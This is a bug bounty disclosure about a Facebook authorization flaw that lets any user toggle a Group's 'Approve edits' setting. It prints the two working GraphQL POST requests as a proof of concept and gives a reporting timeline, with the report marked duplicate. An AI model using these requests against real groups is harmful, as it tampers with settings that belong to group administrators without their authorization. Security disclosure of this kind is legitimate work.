[Facebook] Toggle "Approve edits" settings for any Group

 By making two GraphQL calls, any Facebook user can toggle "Approve edits" settings for any Group without being an Admin, Moderator or even a member.

POC -

The request which turns ON -

-----------------------------------

POST /graphql HTTP/1.1

Host: graph.facebook.com

doc_id=3497359980371442&method=post&locale=en_US&pretty=false&format=json&variables={"input":{"post_edit_approval_setting":"REQUIRE_APPROVAL","group_id":"TARGET_GROUP_ID","actor_id":"ATTACKERS_USER_ID"}}

-----------------------------------

The request which turns OFF -

-----------------------------------

POST /graphql HTTP/1.1

Host: graph.facebook.com

doc_id=3497359980371442&method=post&locale=en_US&pretty=false&format=json&variables={"input":{"post_edit_approval_setting":"NO_APPROVAL","group_id":"TARGET_GROUP_ID","actor_id":"ATTACKERS_USER_ID"}}

-----------------------------------

Timeline -

Reported - Sunday, January 3, 2021

Marked as Duplicate - Friday, January 8, 2021